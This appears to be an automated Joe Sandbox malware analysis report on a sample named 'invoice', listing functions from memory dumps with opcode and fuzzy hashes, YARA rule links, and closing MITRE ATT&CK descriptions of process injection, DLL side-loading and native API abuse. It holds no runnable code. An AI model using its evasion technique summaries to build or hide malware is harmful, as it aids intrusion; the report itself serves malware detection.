Instruction Fuzzy Hash: FE41B131A00249DFEF15CFA8C848B9EBFB2FF4A394F048155EA15AB2A1D335E914CB50

Function 05D48A59 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80451b374b68fb5aa5f166c9bbcf2fcb46a291d2ba5daeeb1b4ac2f712347fcb
Instruction ID: d650d2d19d884f2d23a6d539edbbc0f916279c58e7d230f758081ad3b6d5a1f3
Opcode Fuzzy Hash: 80451b374b68fb5aa5f166c9bbcf2fcb46a291d2ba5daeeb1b4ac2f712347fcb
Instruction Fuzzy Hash: 15413071E002199BDB15DFA5D884ADEBBB5FF88740F24852AE405B7340DB70A946CF91

Function 02F96FC8 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a37900843f57ef63407bf9a510c6216e71d909b1c6cd441e40e52166bf2a180
Instruction ID: 991ab942fb61b434dc979f2a2814f03605c22fa9458832512bb3b92e15ea8672
Opcode Fuzzy Hash: 1a37900843f57ef63407bf9a510c6216e71d909b1c6cd441e40e52166bf2a180
Instruction Fuzzy Hash: 3241FE70A003488FEF109F65C804BAABBF6EF44340F04806AEA159B261DB79DD44CFA1

Function 02F95658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e05db86d6d662c7adfcdbd6b6b02ee3d6368593dc4fbcfe354fa41b8ff3fd02
Instruction ID: 881b5771a4fba7d8a61eb358c4f69f55c846dfc225736b343fae6aac3520fb97
Opcode Fuzzy Hash: 2e05db86d6d662c7adfcdbd6b6b02ee3d6368593dc4fbcfe354fa41b8ff3fd02
Instruction Fuzzy Hash: 6C317C3170021DEFDF069FA5D994AAE3BA2EF48390F904064FA158B250DB39CD61CFA1

Function 05D49F88 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e37926d8a0d64240cf9b16dfade02407761454b4f07902adc93c498286fa3b7
Instruction ID: b76262c4369fab5c2ee68401ca7fb60b057c4bf540d942a91633dbd7012e7ccc
Opcode Fuzzy Hash: 0e37926d8a0d64240cf9b16dfade02407761454b4f07902adc93c498286fa3b7
Instruction Fuzzy Hash: 213104B69012299BCB10CF9AD984BDEFBF4FB08320F14815AE818AB254C3759954CFA4

Function 02F98370 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b0b9475464c831d0ca69536d561aed0ae6302b69fbf00af7f905c0fb5cba38d
Instruction ID: 7806c95274233573fb43a20791be001a95480345a797737d41e94bad6cf517dd
Opcode Fuzzy Hash: 8b0b9475464c831d0ca69536d561aed0ae6302b69fbf00af7f905c0fb5cba38d
Instruction Fuzzy Hash: 0721D631B042088BEF191B7D8A54A3E2AE7AFC77D97084079D606CB359EF25CC42D782

Function 02F98380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c68b6bda8ab8d835cc5412133774d38a2af68f40bf6705835484a4699657230
Instruction ID: 704b25a80067bfe4b50d1c808848d3a0d1f5a7082c904f4dc915664079a7398c
Opcode Fuzzy Hash: 3c68b6bda8ab8d835cc5412133774d38a2af68f40bf6705835484a4699657230
Instruction Fuzzy Hash: 50216D317002158BEF185A298654B3A6697AFC77D9B148039D606CB798EF66CC42D782

Function 02F962F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58f386c3d3f110015e0a311939be055eda790f77b6fa5f1295533a6b1262539b
Instruction ID: 1f5caaa885bae2f15ff6f984cb47f85d4a08cfbdc7febcbf98c3fb292bf732dd
Opcode Fuzzy Hash: 58f386c3d3f110015e0a311939be055eda790f77b6fa5f1295533a6b1262539b
Instruction Fuzzy Hash: A32126357046158FDB199B29D458D2EB7A6EFC97957144069EA1ACB394CF34DC02CB80

Function 02F928F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a50ec31fd9b2cb171ccc38daaac936d9a6bc27be0c7cbd0d046155c2c6f6a85
Instruction ID: 030f9e03cf34f78a8ad3378515a4225954859de17ef94fcce5c13087a3f66f5e
Opcode Fuzzy Hash: 3a50ec31fd9b2cb171ccc38daaac936d9a6bc27be0c7cbd0d046155c2c6f6a85
Instruction Fuzzy Hash: 2D21BD35E00105AFDF24DF64C460AAE37A9EB9D2A4B10C019DD4E9B240DB38EE43CBD2

Function 02F4D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135229530.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f4d000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a7e2392443135b4d944b13b289f0e529f2a03d4be0c77a963caec0d5bf5a047
Instruction ID: 1426140a004f1974265b0256044ea2c31d7012d02abe990198937975966f3418
Opcode Fuzzy Hash: 8a7e2392443135b4d944b13b289f0e529f2a03d4be0c77a963caec0d5bf5a047
Instruction Fuzzy Hash: E7217971604204DFDB00CF18C9C4B26BFA5FB88754F20C56DEA094B355CBB6E446CA61

Function 05D488D0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f45081cc600bd141a38b0b7a2b4e4fafa244841d6ec6502211fadba0451112e3
Instruction ID: a184f7f16be1de950d863a5ec79a31c3880899aaaf9accf151d300ef378f1126
Opcode Fuzzy Hash: f45081cc600bd141a38b0b7a2b4e4fafa244841d6ec6502211fadba0451112e3
Instruction Fuzzy Hash: 5C21E4B1D012199FCB50CF9AD584BDEBBF4FB48320F14806AE819AB355D374A944CFA4

Function 05D49EA9 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f84682d92948ca69e70d9d0dced6b128507649d0903cb2a6456f63322c826b
Instruction ID: b61a8f7562838db204fd2809de3b1ea03086597b837420c9e581e9515bf05a26
Opcode Fuzzy Hash: 35f84682d92948ca69e70d9d0dced6b128507649d0903cb2a6456f63322c826b
Instruction Fuzzy Hash: 6821E2B5D012199FCB10CFAAD584ADEBBF4FF48320F14806AE819AB255D3749A44CFA4

Function 05D48C4A Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8392e172285cd2541c96fe450e079e20ebad6c9426212635548efbd52c0253af
Instruction ID: 6b418bbc7dbad6716b64bc23e64c80bace825c40ae8c64b8accd83285892b4f1
Opcode Fuzzy Hash: 8392e172285cd2541c96fe450e079e20ebad6c9426212635548efbd52c0253af
Instruction Fuzzy Hash: 4711C1327082546FCF46AFB8985466E3FE7EFC9250B55442AE906CB381DE358D0187F6

Function 02F94285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae0be47577870049a9c3743cd0df0af28a7ea0e35f041d5594beef8a0a255c66
Instruction ID: ff7c929e0b43b262a076c5a38d635fa1779ffe2d44e0ba8362e7f3477e6f763e
Opcode Fuzzy Hash: ae0be47577870049a9c3743cd0df0af28a7ea0e35f041d5594beef8a0a255c66
Instruction Fuzzy Hash: 7731B578E11208CFCB44DFA9E59489DBBB6FF49304B2090A9E819AB364D735AD45CF41

Function 02F95649 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc9a2a6d033fc333bd9296a8a2d4f0506079087b03eccd8689a9e95e1ead2e09
Instruction ID: 4b639d3a66027c42a076a590cf05adf5bfc71a25546f074839c698d889ebf70e
Opcode Fuzzy Hash: dc9a2a6d033fc333bd9296a8a2d4f0506079087b03eccd8689a9e95e1ead2e09
Instruction Fuzzy Hash: 1221D131B0520CDFDB069F64D94476A3BA2EF48394F904065EA058B354DB38CE95CFA1

Function 02F9AEF0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4dbc3b405a0e8c91f4d91a2e9e4a6375f921f7ec31a3a844303e4afc91cc106
Instruction ID: 1dcec852008c97ce788548d9bab5e9474cbd7a47b7a9f3467b8ce82f076ae44b
Opcode Fuzzy Hash: a4dbc3b405a0e8c91f4d91a2e9e4a6375f921f7ec31a3a844303e4afc91cc106
Instruction Fuzzy Hash: 3A219D76B10208ABDF18CE54D985BEDBBB6FB8C754F145025FA16A73A0EB319C10CB90

Function 02F99761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a918b1b296206a883c0ac14e2275b4604b7a453d83f540009cee525e12b8da4
Instruction ID: c54b9ec0df6e666ee3f90d74d42fbda3fd4ca6a7e2130a9ba3ed2d2f93813e6a
Opcode Fuzzy Hash: 2a918b1b296206a883c0ac14e2275b4604b7a453d83f540009cee525e12b8da4
Instruction Fuzzy Hash: 08218830E0024C9FEF09CFA2D540AAEBFB6AF48245F648069E405A6290DB35D980CB20

Function 02F96300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ca9398a9bde3eef4580ab1f08ec509abb9ac3fbfb99572a55788d0614dc9153
Instruction ID: 7485f07a5b8ad361387f1595ee86550428655932962b4af0a1705a600bd5942e
Opcode Fuzzy Hash: 4ca9398a9bde3eef4580ab1f08ec509abb9ac3fbfb99572a55788d0614dc9153
Instruction Fuzzy Hash: 5011E5357006159FDB195B2AD458D2E77AAEFC57A53080068EA16CB360DF20DC02CB90

Function 02F9F640 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d71d0d365af67f1b73f686621a605410d9123fc2108ddb89fc8277e54f96f8fd
Instruction ID: 08fb59a9efd6a46d18ef60a5f31a2902219fa5eaba27ac76cac274d120227ed0
Opcode Fuzzy Hash: d71d0d365af67f1b73f686621a605410d9123fc2108ddb89fc8277e54f96f8fd
Instruction Fuzzy Hash: 03218EB4D0020E9FDB05DFAAD98068EBFF2FB45300F0096A9D1549B365EB749A858F80

Function 05D487A8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df80c74ff72824a79d5d16b3f8a808aeaf7f0a61e918c0e652a13b40bc65eb1c
Instruction ID: 437d0fc6cc6008b4ae5c8b82de6e7fc7eee1577da5bc67f72f15126db4b10647
Opcode Fuzzy Hash: df80c74ff72824a79d5d16b3f8a808aeaf7f0a61e918c0e652a13b40bc65eb1c
Instruction Fuzzy Hash: 14113772800259DFDB10DF99C844BDEBFF5EF48320F14841AE968A7211C379A550DFA5

Function 05D48431 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df26130115a32bc1c868dfea42c005e2982d23924f290638474105bbec06a1d9
Instruction ID: 4b9401731525ab6678b6e341d273304e9b06282ff27cb8bafe453826357f5a5f
Opcode Fuzzy Hash: df26130115a32bc1c868dfea42c005e2982d23924f290638474105bbec06a1d9
Instruction Fuzzy Hash: B211FA34E001498FDB14DFB8D850BAEBBF2AB49351F00A4A6E90CF7349EA3099418F51

Function 05D48EF1 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3e51caa02168e9f88882b055712571666b92fefd3a3bba4d544e765a27b7a66
Instruction ID: f048e72b5e919e6f8c09a951aee524e3e81b40031fd9f28d14bd424177ba22dd
Opcode Fuzzy Hash: a3e51caa02168e9f88882b055712571666b92fefd3a3bba4d544e765a27b7a66
Instruction Fuzzy Hash: 9F1134B2800249DFDB10DF99C945BDEBFF5EF48320F14841AE968A7211C339A554DFA5

Function 02F9F650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 108c65b96e450348a63400a095c67caf3320816a4896ba1d15cbf747e91c4a52
Instruction ID: e67c7e6e9fb87c9cc26defe240f3763bd1843dcb89bacc160299112cbf0f5a47
Opcode Fuzzy Hash: 108c65b96e450348a63400a095c67caf3320816a4896ba1d15cbf747e91c4a52
Instruction Fuzzy Hash: EE110A74D0020D9FDB44EFAAD980A9EBBF2FB44304F1095A9D118AB365EB749A458F81

Function 02F927F0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df08db7048a1fbe43901fda6bfd9facb7a44e9448bca17ad29d1297fcfacfa3d
Instruction ID: 59adb2e907b0f14ae3a6b41080cfbec12dcc0125b5b4efcb2bbd5891ac554a4c
Opcode Fuzzy Hash: df08db7048a1fbe43901fda6bfd9facb7a44e9448bca17ad29d1297fcfacfa3d
Instruction Fuzzy Hash: 4721CEB4D1020E8FCF04EFA9D945AEEBFF1EB09311F10516AE909B2250EB305A85CF91

Function 02F4D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135229530.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f4d000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: e6f33619a377b2eae0916c71930436fdb1a619dd2d05677e78154c8503801c04
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 4811BB75904284CFDB11CF14C9C4B16BFA2FB88318F24C6AED9494B256C77AE44ACB62

Function 02F95E98 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b995eb569f235a389e064985b0da86fae1b2f3740391c4209f8b3bd197f7fa78
Instruction ID: 9979df4ff257481fe1285be337de3a691f4682894f87d6cba15a5df11c559f7f
Opcode Fuzzy Hash: b995eb569f235a389e064985b0da86fae1b2f3740391c4209f8b3bd197f7fa78
Instruction Fuzzy Hash: D901F532B001586BDF17AEA598406AE3BABDBC9790F548056FA04CB290EE76CC11DB90

Function 02F9E8E8 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be69b1e0f8a2bedc104c453f029a6cef6f8bf13b3a47c3f94bae36640db75fd4
Instruction ID: a0055f410ae4badf1b6eb2c9eb8b94cb3565d0aeed0149ecc447f6a721791394
Opcode Fuzzy Hash: be69b1e0f8a2bedc104c453f029a6cef6f8bf13b3a47c3f94bae36640db75fd4
Instruction Fuzzy Hash: 95112778E0420ADFDB01DFE9E9449AEBBB1FB89300F004866D914A3351D7749A56CF92

Function 02F9ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8ffc83ec11b72816f9e930f102e2a89bdeeae241aed9bb27431123bb14a603
Instruction ID: 5fd2cc90a87c967ee963d270ffdd9a8e5f4f77aaaee663c140f21d96fa6a4049
Opcode Fuzzy Hash: fc8ffc83ec11b72816f9e930f102e2a89bdeeae241aed9bb27431123bb14a603
Instruction Fuzzy Hash: 38F096317006144BAB156A3ED454A2AB6DEEFC9AD93554079EA09CB365EF21CC03C790

Function 02F928A2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c01742e42aa432c25880a359aec9d1c98a6f59c51869e4b87badac97d750a87
Instruction ID: ea0ef4abb1ea7c807d8bc94f5af03e86c1d94c5388e385c9bc648d8158d51fcb
Opcode Fuzzy Hash: 8c01742e42aa432c25880a359aec9d1c98a6f59c51869e4b87badac97d750a87
Instruction Fuzzy Hash: 47E02632D1072A57CB00EAA0DC044EFBB38EFD1751F90411AD45433180FB306149C2E2

Function 02F96739 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f60c50e3b33e8072ef292187e64fd6c4b0599f42237ef533636cae7e80c2fa2c
Instruction ID: d007d2adfc7037503a7a7ed7f6c1bd69658f59d8410eddc80f4bf1e477b0df16
Opcode Fuzzy Hash: f60c50e3b33e8072ef292187e64fd6c4b0599f42237ef533636cae7e80c2fa2c
Instruction Fuzzy Hash: FBE0CD3580C7480EC703FB79AE591247F37DEA12407C45965A105CF267FF788D498752

Function 02F928B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa223473758a772f4a841187fe15ca08a1097e2deba0a43b3c20d6011a8a8583
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: aa223473758a772f4a841187fe15ca08a1097e2deba0a43b3c20d6011a8a8583
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 02F9D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df6587ed1019ceb210315d2125cae745f514cc1ed117ec5b885472c50e820d52
Instruction ID: dc61e5ee98d7025b115106be454684f31e831b62ff313087292f8da1edf2b5b5
Opcode Fuzzy Hash: df6587ed1019ceb210315d2125cae745f514cc1ed117ec5b885472c50e820d52
Instruction Fuzzy Hash: 92D04235E5410DCBCF24EFA9E5854DCBB71EB59721B20602AE925A3251DA305455CF11

Function 02F9AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a67d06badf7ba7c860b89a0e954d9ddc6b5a517edcdc4a0370a75f0b25d7bc8
Instruction ID: ead0b2fba35e15f608123f37dcf6d8b6abd83ea321c0b0a091ce7cce4698082a
Opcode Fuzzy Hash: 4a67d06badf7ba7c860b89a0e954d9ddc6b5a517edcdc4a0370a75f0b25d7bc8
Instruction Fuzzy Hash: 92D0673AB40018DFCB049F99E8408DDFBB6FB98221B148116F915A3261CA319965DB64

Function 02F96748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bf6b98ee875782d08a613329744a668c92aeea55172a664e7ed824ff63042ea
Instruction ID: 456cc678d94a4c12032d210a1c9c2252a668f864864f2e53ecd06284bff53927
Opcode Fuzzy Hash: 8bf6b98ee875782d08a613329744a668c92aeea55172a664e7ed824ff63042ea
Instruction Fuzzy Hash: 6EC0123454430C4EC605F7B7ED45556771EEAE02407C09520A5050A66DEF785CCA4B91

Non-executed Functions

Function 02F92A69 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

Xbq, xrefs: 02F92BA4
Xbq, xrefs: 02F92B57
Xbq, xrefs: 02F92A9E
Xbq, xrefs: 02F92AD8

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: a0a8fa61e6d62dd43df9536bad3f8522d36f70f4ead6a8f645b8bf4b4472976d
Instruction ID: 72861ce5a1b74836953004b9fc4bbfcfff7352b697c9c92d7252f155662505b7
Opcode Fuzzy Hash: a0a8fa61e6d62dd43df9536bad3f8522d36f70f4ead6a8f645b8bf4b4472976d
Instruction Fuzzy Hash: 55314131E042199BEF64DF79898076FB6F6BB88390F1444B5CA19A7394DB30C985CF92

Function 02F96920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 02F9692C
\;^q, xrefs: 02F9695E
\;^q, xrefs: 02F96936
\;^q, xrefs: 02F96952

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: e8e465afd41bae5d8ae8975c3c59cd86089c84ca4d377bfad85a23eb49868c92
Instruction ID: 3f8c45b2bff2c696eaa7c5f265b22f99a1180db17ac54d12d635fcc0b8975340
Opcode Fuzzy Hash: e8e465afd41bae5d8ae8975c3c59cd86089c84ca4d377bfad85a23eb49868c92
Instruction Fuzzy Hash: 5301BC32B401148FEF2C8E2CC564A2533EFAF88AE4725446AE646CB3B4DA31DC41C740

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

